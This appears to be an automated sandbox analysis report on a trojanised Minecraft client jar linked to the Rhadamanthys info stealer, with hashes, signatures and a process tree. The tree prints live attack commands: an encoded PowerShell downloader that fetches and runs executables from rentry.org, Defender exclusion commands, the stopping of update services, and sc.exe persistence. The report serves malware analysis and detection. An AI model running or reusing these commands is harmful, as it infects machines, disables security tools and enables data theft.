Analysis
-
max time kernel
1800s -
max time network
1706s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
-
submitted
14-06-2024 19:51
General
-
Target
meteor-client-0.5.6.jar
-
Size
4.3MB
-
MD5
aeb72058322874fdd27ff6a756833ca1
-
SHA1
708afcdc073b4da7cbc4f2730a9f4aec301a0192
-
SHA256
0058cfe2b24392bb6d84a7cbae10c66ecadfcef47b31e7fa5ad0e8f0b4f71c99
-
SHA512
81f204fba4b377b171c3d9ac290707808bac1a7d8cf6f955e568d3eec0ef740428cce24c6a7bddaff17f7c6f383ad3694064c55c4dee2b95c50132fb13df78bd
-
SSDEEP
98304:RM2SKrU1EdVTWClwpcBb0ugFxA0aT7gCNh50kKxES20:RM2uuZWClwgbrWAhxKxg0
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Creates new service(s) 2 TTPs
-
Stops running service(s) 4 TTPs
-
Executes dropped EXE 4 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Drops file in System32 directory 9 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Modifies data under HKEY_USERS 15 IoCs
-
Modifies registry class 64 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
-
Suspicious use of AdjustPrivilegeToken 48 IoCs
-
Suspicious use of FindShellTrayWindow 35 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\meteor-client-0.5.6.jar2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeC:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M3⤵
- Modifies file permissions
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde1b23cb8,0x7ffde1b23cc8,0x7ffde1b23cd83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5076 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5464 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3360 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3352 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4736 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1860,2697269649325265669,9566670457371005853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6880 /prefetch:83⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Downloads\HXSoftware\HXSoftware.exe"C:\Users\Admin\Downloads\HXSoftware\HXSoftware.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\b0mjkh2j.jz52.exe"C:\Users\Admin\AppData\Roaming\b0mjkh2j.jz52.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\b0mjkh2j.jz53.exe"C:\Users\Admin\AppData\Roaming\b0mjkh2j.jz53.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\Downloads\HXSoftware\HXSoftware.exe"C:\Users\Admin\Downloads\HXSoftware\HXSoftware.exe"2⤵
-
